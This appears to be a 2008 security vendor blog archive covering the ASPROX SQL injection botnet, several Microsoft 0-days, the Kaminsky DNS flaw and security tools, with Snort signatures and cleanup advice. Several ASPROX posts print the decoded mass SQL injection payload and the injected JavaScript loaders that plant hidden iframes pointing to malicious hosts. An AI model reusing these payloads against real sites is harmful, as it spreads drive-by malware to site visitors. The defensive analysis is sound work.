Tuesday, December 23, 2008

MS-SQL 0-day vulnerability remotely exploitable

Microsoft just announced the MS-SQL sp_rewrite vulnerability I blogged about last Wednesday and looks like
mainstream news
is just picking up and reporting on it.

The attack has just morphed into a critical remote flaw as it's reported it can now be exploited through SQL injection. This is an ASPROX type attack but much more dangerous as it allows attackers to gain full privilege to run commands on the SQL server as the administrator.

If your a Sentinel IPS customer, the previous signature and our older SQL injection signatures adequately defend from this attack so rest easy and enjoy the holidays!


Why is this considered a 0-day if we have known about it for a week? Well there is exploit code available and no patch yet from Microsoft... We call that 0-day as attackers can wreck havoc with no patch defenses available.

Wednesday, December 17, 2008

Internet Explorer XML 0-day and MS-SQL vulnerabilities

Two new critical MS vulnerabilities released in early January the IE flaw (buffer overflow in the XML parser) is particularly nasty. This is a client side bug which can be triggered by clicking a malicious link from anywhere including emails...

This bug is rated "Extremely Critical", easiest workaround is to use Firefox for browsing until patched.

http://www.microsoft.com/technet/security/advisory/961051.mspx
http://secunia.com/advisories/33089/

The MS-SQL white has potential currently only allows privilege escalation and no remote code execution.

http://www.sec-consult.com/files/20081209_mssql-sp_replwritetovarbin_memwrite.txt

Sentinel IPS has signatures to protect against both.

Expoit Code Release for IE XML vuln:
http://www.milw0rm.com/exploits/7410
http://www.milw0rm.com/exploits/7477
http://www.milw0rm.com/exploits/7403

As always patch, patch, patch!

Saturday, November 15, 2008

Google to save the world

Ok not really, but most of you have noticed Google now using it's search heuristics to track outbreaks of the flu across North America. link

This could be exciting news for the health and science, but what is more exciting to me in IT security is their integration of Google Safe Browsing into Firefox 3. This to me is the single most powerful and simple security feature added to a browser since the gold padlock indicating encryption.

Here is how it works, Google does all the heavy lifting and tracks malware infections based on the site that distributes them. Once a site reaches the threshold of malware infections it is deemed unsafe browsing and added into Google's Anti-Malware database. Google released an API to quickly check the database for URL in real-time from a browser. So if you visit a site which is in the database you are redirected to a warning page letting you know this site is unsafe and gives links to detailed information on the malware and number of infections. You of course can bypass it and proceed to your site, but the average user will be effectively deterred from browsing.

Firefox 3 now comes standard with this feature.

Did I mention Google is working to cure world hunger and cancer in ten years?

Thank you Google, really.

Monday, October 27, 2008

MS08-067 Windows Server Remote Exploit Information

We received a flood of requests from our customers to see if Sentinel IPS is protecting against attacks on this new vulnerability. Once we assured them we have several signatures are in place, (thanks Emerging Threats!) I figured a follow up with some information on this vulnerability would be helpful.

First the vulnerability is a remote buffer overflow in the RPC (remote procedure call) code in Windows OS. This vulnerability allows full code execution/system compromise over the wire.

Second, MS went public with information on this vulnerability around October 22nd after it found info of active exploitation in the wild.

Is public exploit code available? "You betcha", http://www.milw0rm.com/exploits/6841

Which versions of Windows are vulnerable? Microsoft Windows 2000, Windows XP, Windows Vista, Windows 2003 Server and Windows Server 2008

Is there a patch, update available? Yes, MS pushed an emergency update (out of band patch) on Friday, Oct 24th. That gives you an idea how serious this is.

Doesn't my firewall protect this? Yes, sort of... If you are denying ports 139 and 445 to the host, but you are likely vulnerable to your LAN, and if your grandma plugs directly into her DSL modem and turned off that pesky Windows firewall (uh oh).

What happens when I am compromised? There is a worm/botnet currently spreading using this vulnerability and after successful compromise, it then scans the local network for vulnerable machines. This means dirty laptops are extremely high risk to spread this worm.

What is the malware which the worm spreads? It is your standard auto-propigating trojan/malware/botnet client which is currently going by the name Gimmiv (Win32.Gimmiv.a/b worm).

What can I do? Keep an eye on your machines, run the latest AV software and make sure your firewalls and IPS are protecting ports 139/445 wherever possible. Last but not least, patch patch patch!

Godspeed.

Tuesday, October 14, 2008

ASPROX still alive, deryv.ru

deryv.ru is the latest domain used by the ASPROX Botnet based SQL Injection attacks on insecure ASP websites.

Other current ASPROX domains include:
lang42.ru, s800qn.cn, s800qn.cn, ss11qn.cn

Grab our ASPROX toolkit for information on cleaning and defending from this threat.

Tuesday, October 7, 2008

To jailbreak or not to jailbreak the iPhone 3G

I am blogging right now through my newly jailbroken iPhone 3g with 2.1 firmware... using some blogging application and typing on the tiny keyboard you may ask? Not today, I am infact using PDAnet a free Internet sharing app for jailbroken iPhones which allows you to connect your laptop pc (any variety) to your iPhone via ad-hoc wireless networking and then gain access to the Internet through your phones 3g or edge connection.

I can say this app alone is reason enough to jailbreak your iPhone... I mean, Starbucks coffee is expensive enough, paying for their Internet access is a slap in the face.

So what other wonderful goodies are available exclusively to a jailbroken iPhone? Well this is an Information Security blog so how could I not talk about the excellent new Stumbler Plus app. It is a full featured wardriving and wireless network auditing tool (GUI) and it is really quite sweet. Here are some features:

1. Finds hidden SSID's
2. Reverses AP MAC Addresses automatically to the Vendor name (COOL!)
3. Records Signal Strength, Encryption Type, and Long/Lat via GPS!

Only downsides I have found is there is no automatic feature to keep scanning while you drive, it requires you to repeatedly hit the scan button, also it doesn't seem to have a save or email results feature.

So those are the two killer jailbreak apps currently out for the iPhone 3g. I am sure some of you will wonder why I didn't mention nmap and metasploit, but if you have tried to use either on the buggy xterm app and tiny keyboard, it is not something to be desired. Maybe I will create a one button GUI version of metasploit that uses autopwn... hrmm my list of projects are getting out of control

Wednesday, October 1, 2008

Are you ready for IPv6?

Vint Cerf one of the core developer's of IPv4 and now an evangelist for Google says time is running out at 32-bit IP addresses...

Article from timeonline.co.uk

So the question I pose is are you ready? To truly know, you have to ask yourself a few questions...

1. Does your ISP provide IPv6 connectivity (raw or tunneled)?

2. Most networking equipment and Operating systems support IPv6: but does your security equipment? If you use IDS/IPS, it's highly probably IPv6 is not yet supported or requires a software update to get there. This is based on the Snort the industry standard IDS gaining IPv6 support in recent 2.6+ releases.

3. Do you understand the security architecture changes required for IPv6?: Every node will have a public IP, no more NAT means privacy and security will have to be re-evaluated as every host will be addressable.

For example if Sally goes to website xyz.com from work, only the common WAN IP of the office is saved in xyz.com's access logs if using standard IPv4 NAT gateway. Under IPv6 the website would log the public IP designated specifically for Sally's computer and route directly back to her without NAT translation. So not only could an attacker potentially tie the website visit to Sally, he could also know the direct address to attack her computer.

4. DNS will become more important: while there are ways to simplify IPv6 notation so you don't have to remember a lengthy hex string, it will be more likely to heavily use DNS to address your LAN machines.

5. Dual mode IP stack: so most current Operating Systems like Vista, OSX and Linux come default running support for both IPv4 and IPv6, well think of the two like different layers as you could essentially be attacked on either IP protocol. You will have to remember this when designing your architecture for IPv6 so you do not leave a blind eye on IPv4 traffic.

Monday, September 8, 2008

LinuXploit Crew Frontpage author.dll core-project/1.0 attacks

Received some reports about widespread frontpage extension attacks (old but still working). Example of a hacked site

Here is a quick snort signature I whipped up for protection/detection and associated traffic (thanks Jack Pepper for tcpdump):

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"WEB linuXploit crew Frontpage access.dll attempt"; flow:established,to_server; content:"POST"; nocase; uricontent:"_vti_aut/"; nocase; uricontent:"author.dll"; nocase; content:"core-pro
ject"; nocase; reference:url,infosec20.blogspot.com; classtype:web-application-attack; sid:3001728; rev:2;)


The browser type is: core-project/1.0

0x0030: 0000 0000 504f 5354 202f 5f76 7469 5f62 ....POST./_vti_b
0x0040: 696e 2f5f 7674 695f 6175 742f 6175 7468 in/_vti_aut/auth
0x0050: 6f72 2e64 6c6c 2048 5454 502f 312e 310d or.dll.HTTP/1.1.
0x0060: 0a4d 494d 452d 5665 7273 696f 6e3a 2031 .MIME-Version:.1
0x0070: 2e30 0d0a 5573 6572 2d41 6765 6e74 3a20 .0..User-Agent:.
0x0080: 636f 7265 2d70 726f 6a65 6374 2f31 2e30 core-project/1.0
0x0090: 0d0a 486f 7374 3a20 7777 7777 2e61 6161 ..Host:.wwww.aaa
0x00a0: 6161 612e 6564 750d 0a41 6363 6570 743a aaa.edu..Accept:
0x00b0: 2061 7574 682f 7369 6369 6c79 0d0a 436f .auth/sicily..Co
0x00c0: 6e74 656e 742d 4c65 6e67 7468 3a20 3132 ntent-Length:.12
0x00d0: 3037 0d0a 436f 6e74 656e 742d 5479 7065 07..Content-Type
0x00e0: 3a20 6170 706c 6963 6174 696f 6e2f 782d :.application/x-
0x00f0: 7665 726d 6565 722d 7572 6c65 6e63 6f64 vermeer-urlencod
0x0100: 6564 0d0a 582d 5665 726d 6565 722d 436f ed..X-Vermeer-Co
0x0110: 6e74 656e 742d 5479 7065 3a20 6170 706c ntent-Type:.appl
0x0120: 6963 6174 696f 6e2f 782d 7665 726d 6565 ication/x-vermee
0x0130: 722d 7572 6c65 6e63 6f64 6564 0d0a 436f r-urlencoded..Co
0x0140: 6e6e 6563 7469 6f6e 3a20 636c 6f73 650d nnection:.close.
0x0150: 0a43 6163 6865 2d43 6f6e 7472 6f6c 3a20 .Cache-Control:.
0x0160: 6e6f 2d63 6163 6865 0d0a 0d0a 6d65 7468 no-cache....meth
0x0170: 6f64 3d70 7574 2b64 6f63 756d 656e 7425 od=put+document%
0x0180: 3361 3425 3265 3025 3265 3225 3265 3437 3a4%2e0%2e2%2e47
0x0190: 3135 2673 6572 7669 6365 2535 666e 616d 15&service%5fnam
0x01a0: 653d 2664 6f63 756d 656e 743d 2535 6264 e=&document=%5bd
0x01b0: 6f63 756d 656e 7425 3566 6e61 6d65 2533 ocument%5fname%3
0x01c0: 6469 2532 6568 746d 2533 626d 6574 6125 di%2ehtm%3bmeta%
0x01d0: 3566 696e 666f 2533 6425 3562 2535 6425 5finfo%3d%5b%5d%
0x01e0: 3564 2670 7574 2535 666f 7074 696f 6e3d 5d&put%5foption=
0x01f0: 6f76 6572 7772 6974 6526 636f 6d6d 656e overwrite&commen
0x0200: 743d 266b 6565 7025 3566 6368 6563 6b65 t=&keep%5fchecke
0x0210: 6425 3566 6f75 743d 6661 6c73 650a 3c68 d%5fout=false.h
0x0220: 746d 6c3e 0d0a 3c68 6561 643e 0d0a 3c74 tml..head..t
0x0230: 6974 6c65 3e6c 696e 7558 706c 6f69 745f itle linuXploit_
0x0240: 6372 6577 3c2f 7469 746c 653e 0d0a 3c6d crew /title..m
0x0250: 6574 6120 6874 7470 2d65 7175 6976 3d22 eta.http-equiv="
0x0260: 436f 6e74 656e 742d 5479 7065 2220 636f Content-Type".co
0x0270: 6e74 656e 743d 2274 6578 742f 6874 6d6c ntent="text/html
0x0280: 3b20 6368 6172 7365 743d 6973 6f2d 3838 ;.charset=iso-88
0x0290: 3539 2d31 223e 0d0a 3c2f 6865 6164 3e0d 59-1"../head.
0x02a0: 0a0d 0a3c 626f 6479 2062 6763 6f6c 6f72 ...body.bgcolor
0x02b0: 3d22 2346 4646 4646 4622 3e0d 0a3c 6469 ="#FFFFFF"..di
0x02c0: 7620 616c 6967 6e3d 2263 656e 7465 7222 v.align="center"
0x02d0: 3e0d 0a20 203c 703e 3c66 6f6e 7420 7369 ....pfont.si

Friday, August 22, 2008

RedHat Linux Compromised

Last night Red Hat Inc. announced that their main distribution servers were compromised and this morning patches were released to fix apparently modified OpenSSH packages.

This is an incredibly interesting vector of attack, both releases of Red Hat Enterprise Linux v4, v5 and Fedora were modified with attackers essentially including their own key to the front door (ssh) into the operating system. If you have installed RHEL or Fedora from ftp or http sources recently you will certainly need to: "yum update"

https://www.redhat.com/archives/fedora-announce-list/2008-August/msg00012.html
https://rhn.redhat.com/errata/RHSA-2008-0855.html
http://www.redhat.com/security/data/openssh-blacklist.html

Thursday, August 21, 2008

Blackhat / Defcon 2008 Security Tool Round-up

Now that Blackhat and Defcon are over and most of us have recovered from the associated hang overs, it's fine time we review some of the great projects released at the events:

Karmasploit



This addition to the SVN tree of Metasploit includes the KARMA wireless hacking toolkit enabling many fake-AP hijacking and side-jacking attacks. If you thought your CEO was in danger at Starbucks before, now you really have to look out! Karmasploit makes hijacking sessions, capturing passwords and redirecting traffic mind numbing easy. In addition a universal wireless driver with injection support was added called "airbase" to allow you to complete attacks with most off the shelf wireless cards.

http://metasploit.com/dev/trac/wiki/Karmetasploit


Grendelscan



A new cross platform full featured web application penetration tool. Grendelscan is has filled the void in a free open source tool thats cross platform (Win/Linux/OSX) nice GUI and very advanced feature set including XSS, SQL Injection, HTTP fuzzing and standard misconfiguration checks powered by an updated set of Nikto signatures. With HP and many others releasing watered down applications I see Grendelscan quickly becoming THE defacto tool in web app vulnerability testing.

http://grendel-scan.com/

Beholder



An open-source wireless IDS system, with detection for injection, replay attacks, rouge AP's and hijacking attempts. Sounds like a promising tool especially for small-medium business to get a view into their wireless space and little budget for the mostly commercial WIDS systems. Yes Kismet does some of this but it was originally designed for wardriving and is not as featured as Beholder claims to be.

http://www.beholderwireless.org/

Nmap



Obviously not a new tool but Fyodor announced extensive upgrades to the newest development version of nmap at Defcon. Most interesting upgrades are the faster scanning techniques based on common ports, better OS detection and last but not least a rockin new revamed GUI version Zenmap which has a mind blowing network mapping function which auto-creates a 3D network map showing host associations and ability to pan and tilt (the demo of this feature had the crowd in an uproar of excitement). Zenmap supports OSX in addition to Windows and Linux

http://nmap.org/zenmap/


Voiper



Voiper is a toolkit for fuzzing and attacking VOIP protocols and devices. It currently only supports the SIP protocol but seems like a promising tool for penetration testing VOIP.

http://sourceforge.net/projects/voiper/

Tuesday, August 5, 2008

Defcon 2008 Party Round Up

Compiled a list of parties going on at Defcon 16 this year so I am tracking them here to share with the security/beer lover's community.

Core Security Customer Briefing and Cocktail Party
Date: Thursday, August 7
Cocktail party: 6:30-8:30pm
Location: Sushi Roku in The Forum Shops at Caesars
Info: Requires RSVP and Pass obtained at Core booth at Blackhat

Ethical Hacker Network Party
When: Thurs evening, Aug 7, 2008 from 8:00 - 11:00pm
Where: Hofbrauhaus Las Vegas

Microsoft Party
When: Thurs night 12pm
Where: Location TBD
Info: Invite only, bring your glowsticks and they will supply alcohol and bluescreens

StillSecure Freakshow Party
When: Sat Aug 9th 9pm-1am
Where: Top of the Riviera (roof?)
Info: Free booze and prizes if you dress up like a freak?

What: theSummit EFF/THF Fund Raiser
When: Thursday Auguest 7th, 2008 9pm-12am
Where: TBD (Either the Skyboxes OR Top of the Riv)


Non corporate sponsored:

Hacker Pimps
When: Fri Aug 8th 9pm-2am
Where: Riviera Skybox 207 and 208

Spiders are Fun Party
When: Fri Aug 8th ?pm-?am
Where: Riviera Skybox 206


Email me if you know of any others which are not listed here: gregm @ econet dot com



Oh and if you were curious about the female attendance at Defcon make sure to read this wired article

Monday, August 4, 2008

ASPROX Latest Attack Vector: JS.JS

Most ASPROX SQL Injection attacks are now using js.js

Grab our ASPROX toolkit for information on cleaning and defending from this threat.

Here are the latest ASPROX domains detected:

www.porv.ru/js.js
www.ncbw.ru/js.js
www.98hs.ru/js.js
www.nwj4.ru/js.js
www.bywd.ru/js.js
www.bgsr.ru/js.js
www.ibse.ru/js.js
www.uhwc.ru/js.js
www.ojns.ru/js.js
www.8hcs.ru/js.js
mo98g.cn/q.js
abc.verynx.cn/w.js
www.bosf.ru/js.js
www.bnsr.ru/js.js
www.ch35.ru/js.js
www.jve4.ru/js.js
www.nmr43.ru/js.js
www.bce8.ru/js.js
www.ncwc.ru/js.js
www.njep.ru/js.js
www.bjxt.ru/js.js
www.b4so.ru/js.js
www.kj5s.ru/js.js
www.oics.ru/js.js
www.po4c.ru/js.js
www.kjwd.ru/js.js
www.bsko.ru/js.js
www.pfd2.ru/js.js
www.iroe.ru/js.js
www.gty5.ru/js.js
www.kpo3.ru/js.js
www.ncb2.ru/js.js
www.kr92.ru/js.js

Monday, July 28, 2008

You have a new update available...

On the tail of the huge DNS flaw, Argentinian group InfoByte Security Research have released a shocking new tool to exploit insecure application updates using man in the middle attack including Kaminsky's DNS poisoning.

Essentially "Evilgrade" is both an attack toolkit and mock update server framework to redirect application's update services to the host running Evilgrade. If successful full system compromise is capable giving the attacker a passive way to amass a botnet.

Evilgrade has support for exploiting the following popular program's update services:
Java, Winzip, Winamp, Mac OS X, OpenOffice, iTunes, Linkedin Toolbar

So what is the upside to such a scary tool? It will likely force developers to create new a new secure process for pushing updates, probably moving to some sort of PKI architecture.

Thursday, July 24, 2008

Kaminsky DNS Cache Poisoning PoC Exploit in Metasploit SVN

Looks like Druid and HDM have release a proof of concept exploit in Metasploit to attack nameserver's using Kaminsky's now leaked vulnerability. This is huge because not only is the attack unbelievably easy execute, 95% of the Internet is still vulnerable!

This is a historical moment in IT Security and will be a very, very busy day for those of us on the defense side.

Exploit Code:

http://www.caughq.org/exploits/CAU-EX-2008-0002.txt

http://www.caughq.org/exploits/CAU-EX-2008-0003.txt

Or simply grab the latest metasploit:

svn co http://metasploit.com/svn/framework3/trunk/

Snort signatures I wrote for Emerging Threats:

alert udp any 53 -> $HOME_NET any (msg:"ET CURRENT_EVENTS DNS Query Responses with 3 RR's set (50+ in 2 seconds) - possible NS RR Cache Poisoning Attempt"; content: "|85 00 00 01 00 01 00 01|"; offset: 2; within: 8; threshold: type both, track by_src,count 50, seconds 2; classtype:bad-unknown; reference:url,infosec20.blogspot.com/2008/07/kaminsky-dns-cache-poisoning-poc.html; sid:2008447; rev:10;)

alert udp any 53 -> $HOME_NET any (msg:"ET CURRENT_EVENTS DNS Query Responses with 3 RR's set (50+ in 2 seconds) - possible A RR Cache Poisoning Attempt"; content: "|81 80 00 01 00 01 00 01|"; offset: 2; within: 8; threshold: type both, track by_src, count 50, seconds 2; classtype:bad-unknown; reference:url,infosec20.blogspot.com/2008/07/kaminsky-dns-cache-poisoning-poc.html; sid:2008457; rev:10;)


*** Update ***
New metasploit module out this morning which allows you to overwrite cache poisoning the NS record for an entire domain. This means if you have evil NS server to take requests you mass own entire domains such as google, microsoft, etc. Scary stuff.

http://blog.wired.com/27bstroke6/2008/07/dns-exploit-in.html

Tuesday, July 22, 2008

Major DNS Flaw revealed

The Security blogosphere is exploding with chatter today about leaked details of Dan Kaminsky's multi-vendor DNS flaw.

Here is how it works (according to leak):

Malory wants to poison the server ns.polya.com

Malory sends NS requests for ulam00001.com, ulam00002.com … to ns.polya.com.

Malory then sends a forged answers, saying that the NS for http://www.ulam00002.com is ns.google.com *AND* puts a glue record saying that ns.google.com is 66.6.6.6

Because the glue records corresponds with the answer record, (same domain) the targetted nameserver will cache or replace it’s curent record of ns.google.com to be 66.6.6.6

http://addxorrol.blogspot.com/2008/07/on-dans-request-for-no-speculation.html

Make sure to read the comments for details of the original leak (Matasano's blog), the drama is Matasano originally called BS on the flaw forcing Dan to back it up with a phone briefing. Thomas Ptacek then re-tracked his BS claims under the agreement he would keep quiet. Now the same guy leaked the technical details is attempting to apologize... What a jerk.

http://www.matasano.com/log/1105/regarding-the-post-on-chargen-earlier-today/

Updated ASPROX Toolkit

We have a new tool kit available with the following important additions:

T-SQL code for cleaning infected databases.

URLScan configuration instructions for catching injection attempts.

click here to grab the new tool kit

Thursday, July 10, 2008

ASPROX Domain Master List

adwnetw.com, bnsdrv.com, butdrv.com, cdrpoex.com, crtbond.com, destad.mobi, drvadw.com, gbradw.com, loopadd.com, porttw.mobi, pyttco.com, tertad.mobi, usaadw.com, usabnr.com, apidad.com, mainbvd.com, bnrbtch.com, ucomddv.com, brsadd.com, asodbr.com, canclvr.com, portwbr.com, catdbw.mobi, allocbn.mobi, testwvr.com, stiwdd.com, adwadb.mobi, dbgbron.com, ktrcom.com, hiwowpp.cn, clrbbd.com, browsad.com, blockkd.com, bnradd.mobi, bnrbase.com, adbtch.com, aladbnr.com, aladbnr.com, loctenv.com, bnrbasead.com, appdad.com, blcadw.com, destbnp.com, attadd.com, nopcls.com, ausbnr.com, bkpadd.mobi, tctcow.com, ausadd.com, movaddw.com, cliprts.com, tid62.com, kadport.com, suppadw.com, supbnr.com, adwsupp.com, bnrupdate.mobi, adwste.mobi, adupd.mobi, hlpgetw.com, hdadwcd.com, rid34.com, adupd.mobi, adwste.mobi, bnrupdate.mobi, cntrl62.com, config73.com, cont67.com, csl24.com, debug73.com, default37.com, get49.net, pid72.com, pid76.net, web923.com, base48.com, asp63.com, form43.com, maigol.cn, app52.com, appid37.com, apps84.com, asp27.com, asp72.com, script46.com, ssl39.com, st212.com, cid26.com, dl251.com, getbwd.com, st212.com, asp707.com, aspssl63.com, aspx49.com, batch29.com, bin963.com, bios47.com, hlpgetw.com, lang34.com, update34.com, westpacsecuresite.com, nihaorr1.com, free.hostpinoy.info, xprmn4u.info, nmidahena.com, winzipices.cn, sb.5252.ws, aspder.com, 11910.net, bbs.jueduizuan.com, bluell.cn, 2117966.net, s.see9.us, xvgaoke.cn, 1.hao929.cn, 414151.com, cc.18dd.net, yl18.net, kisswow.com.cn, urkb.net, c.uc8010.com, rnmb.net, ririwow.cn, killwow1.cn, xiaobaishan.net, qiqigm.com, wowgm1.cn, wowyeye.cn, 9i5t.cn, c11.8866.org, computershello.cn, tlcn.net, z008.net, b15.3322.org, qiqicc.cn, direct84.com, heihei117.cn, caocaowow.cn, qiuxuegm.com, locale48.com, firestnamestea.cn, fami4ka.net, redir94.com, rexec39.com, en-us18.com, ck1.in, adjuncnet.com, rundll92.com, sysid72.com, n.uc8010.com, libid53.com, qiqi111.cn, heartgames.cn, logid83.com, datajto.com, adw95.com, tjwh202.162.ns98.cn, jetadwor.com, cookieadw.com, bannerupd.com, nb88.cn, bigadnet.com, 1.cool0.biz, updatebnr.com, flyzhu.9966.org, sslnet72.com, advertbnr.com, script46.com, fengnima.cn, tag58.com, banner82.com, smeisp.cn, hoursebuilds.cn, hyperadw.com, adsitelo.com, okey123.cn, b.kaobt.cn, getadw.com, nihao112.com, al.99.vc, aidushu.net, a.13175.com, chliyi.com, free.edivid.info, 52-o.cn, fucksb.net, 0.actualization.cn, d39.6600.org, h28.8800.org, 001yl.com, ucmal.com, t.uc8010.com, dota11.cn, pingbnr.com, bnrcompro.com, y66.us, m11.3322.org, bc0.cn, clsidw.com, adword71.com, killpp.cn, bnradw.com, cmiia.com, sslput4.com, exe94.com, bnrcntrl.com, w11.6600.org, usuc.us, hlpadw.com, jumpbnr.com, advabnr.com, siteid38.com, msshamof.com, refer68.com, newasp.com.cn, wowgm2.cn, mm.jsjwh.com.cn, updatead.com, win496.com, usuc.us, view89.com, 17ge.cn, err68.com, upgradead.com, adword72.com, kk6.us, clickbnr.com, 117275.cn, c23.2288.org, sysid72.com, encode72.com, exec51.com, pingadw.com, vb008.cn, wow112.cn, nihaoel3.com, p060523.info, o7n9.cn, rundll841.com, jetdbs.com, dbdomaine.com, domaincld.com, clsiduser.com, heiheinn.cn, coldwop.com, alzhead.com, chinabnr.com, adwbnr.com, chkbnr.com, chkadw.com

ASPROX Botnet up to 16,500 Zombies

Just a quick update, ASPROX is currently around 16,500 zombies up from 12k last week.

Get the updated IP list of the infected zombie hosts

And make sure to grab our ASPROX information toolkit

Monday, July 7, 2008

ASPROX Payload Morphed NGG.JS

New domains found and new javascript payload "ngg.js" replaced the previous "b.js".

And it doesn't seem to be wasting any time:
http://www.google.com/search?q=ngg.js
Results 1 - 10 of about 19,300 for ngg.js. (0.03 seconds)

New SQL Injection Payload (HEX DECODED):

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''script src=http://www.apidad.com/ngg.js /script''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Whats in ngg.js? Familiar iframe attack from before but this time selectively ignores browsers from Russia, Ukraine, China, Korea, Vietnam and India. Lovely :)

window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("updngg=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+11*3600*1000);
document.cookie = "updngg=update;expires="+expires.toGMTString();
try{
document.write("iframe src=http://mainbvd.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0>/iframe");
}
catch(e)
{
};
}}



New ASPROX domains spotted:
apidad.com, mainbvd.com, bnrbtch.com, ucomddv.com, brsadd.com, asodbr.com, canclvr.com, portwbr.com, catdbw.mobi, allocbn.mobi, testwvr.com, stiwdd.com, adwadb.mobi, dbgbron.com, ktrcom.com, hiwowpp.cn, clrbbd.com, browsad.com, blockkd.com, bnradd.mobi, bnrbase.com, adbtch.com, aladbnr.com, aladbnr.com, loctenv.com, bnrbasead.com, appdad.com, blcadw.com, destbnp.com, attadd.com, nopcls.com, ausbnr.com, bkpadd.mobi, tctcow.com, ausadd.com, movaddw.com, cliprts.com


Snort signature to detect access of infected site:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ASPROX Infected Site - ngg.js Request"; flow:established,to_server;
uricontent:"/ngg.js"; classtype:trojan-activity; reference:url,infosec20.blogspot.com/; rev:1; sid:4000002;)

And finally go here to download Sentinel IPS' ASPROX Information Toolkit

Thursday, July 3, 2008

ASPROX Botnet Fingerprinted: 11,816 Zombies

Today at 2pm CST I launched a massive query on our widespread network of Sentinel IPS appliances pulling unique source IP's from the ASPROX SQL Injection attacks.

Now we have an idea of size, location of zombies and a giant block list which we have made available right here

**Update** This is a list of infected machines emanating the SQL Injection attacks, not the number of compromised ASP websites, which is much higher nearing 100,000.

Was fun to whip up this geo-map of ASPROX's zombies...

Wednesday, July 2, 2008

New ASPROX / SQL Injection Defense Tools

ASPROX is not letting up, many of our clients are still seeing SQL Injection attacks blocked every 3-5 minutes on their Sentinel.

Microsoft released a tool for scanning your ASP and ASPX code and identifying SQL Injection vulnerabilities. I highly recommend giving it a try kb-954476

Also HP released a free version of their web security auditing tool specifically to check for SQL Injection, it's called Scrawler and you can get it here


More ASPROX domains (they don't give up, do they?):

tid62.com, kadport.com, suppadw.com, supbnr.com, adwsupp.com, bnrupdate.mobi, adwste.mobi, adupd.mobi, hlpgetw.com, hdadwcd.com, rid34.com, adupd.mobi, adwste.mobi, bnrupdate.mobi, cntrl62.com, config73.com, cont67.com, csl24.com, debug73.com, default37.com, get49.net, pid72.com, pid76.net, web923.com, base48.com, asp63.com, form43.com, maigol.cn


And finally we are still emailing our ASPROX Toolkit document which gives information on the attack and how to recover from it if you organization has been compromised.

Tuesday, July 1, 2008

Iframes and IE, vewwy vewwy bad...

Response poured in from my last post wanting to know how Malware can be loaded from simply including an iframe (sourcing html from another site).

Well in case you too are wondering, MS never intended it to be that way....

See http://www.kb.cert.org/vuls/id/516627


New ASPROX domains: dl251.com

Monday, June 30, 2008

ASPROX SQL Compromised my website, now what?

Many people are calling and emailing us for information about ASPROX and something most people seem to be unaware of is how this affects the visitors of your infected website?

So I will walk you through what happens:

Once your ASP website is compromised by the ASPROX SQL Injection you now host malware. A malicious piece of javascript "b.js" is loaded from one of the domains listed in my previous posts, the javascript creates a "asprox was here" cookie and opens a hidden 0 pixel iframe from yet another bad domain which is "the malware can of worms". These domains constantly rotate IP's (for protection from blocklisting) using fast flux dns.

Here is sample contents from the javascript (b.js):

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("updatebng=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+12*1*60*60*1000);
document.cookie = "updatebng=update;expires="+expires.toGMTString();
try{
document.write("iframe src=http//supbnr.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0 /iframe");
}
catch(e)
{
};
}


The malware can vary but is typically a mishmash of exploits which target several recent browser based vulnerabilities in quicktime, adobe reader, flash and even AOL instant messenger. Once a vulnerable client goes to your site the malware is successfully loaded and not only becomes a zombie slave within the ASPROX botnet (the same hosts that attacked your webserver) it also installs various nefarious programs like a password stealer which defrauds you of your online accounts. Infected clients are reported to be sending out bank phishing emails as well.

So in short review for those who are not-so-technical...

if you have a website infected with ASPROX and not cleaned/updated/secured, your website is infecting and spreading malware to others who simply viewed your site in their browser



That means you have an obligation to address this problem immediately! Please contact us for the information packet on ASPROX defense today.

Thursday, June 26, 2008

ASPROX SQL Injection Attacks cont.

ASPROX continues to ravage the web, please contact us for the information packet we put together with defense suggestions.

New ASPROX malware domains: app52.com, appid37.com, apps84.com, asp27.com, asp72.com, script46.com, ssl39.com, st212.com, cid26.com, dl251.com, getbwd.com, st212.com, asp707.com, aspssl63.com, aspx49.com, batch29.com, bin963.com, bios47.com, hlpgetw.com, lang34.com, update34.com, westpacsecuresite.com

Monday, June 23, 2008

ASPROX SQL Injection Botnet and iFrame/Malware

We first noticed this attack when one of our larger clients saw a barrage of SQL injection alerts in the report of their Sentinel IPS (6,000 in one week). We looked into and found the extremely clever attack which hides the SQL Injection payload in a hexidecimal string to evade IDS/IPS. Well our device caught the attack at the initial injection stage hence the hex evasion portion of the attack failed.

So what is the good news? Sentinel IPS our managed security product protects against this attack even before it reaches your webserver by catching the initial SQL injection. This means instant protection from this ASP/SQL Injection threat without having to re-write your ASP code over night.

Grab our ASPROX toolkit for information on cleaning and defending from this attack.


***UPDATE*** I met with Dallas US Secret Service office today and this issue is much more wide spread than we previously thought. We want to help so if you have any information for us or need assistance cleaning up this mess give us a call.

How do you know if your site was compromised? Check your ASP application with your browser by viewing source and seeing if their is javascript which loads an iframe containing any of the following domains:

***UPDATE*** Maybe faster to search for the string "/b.js"

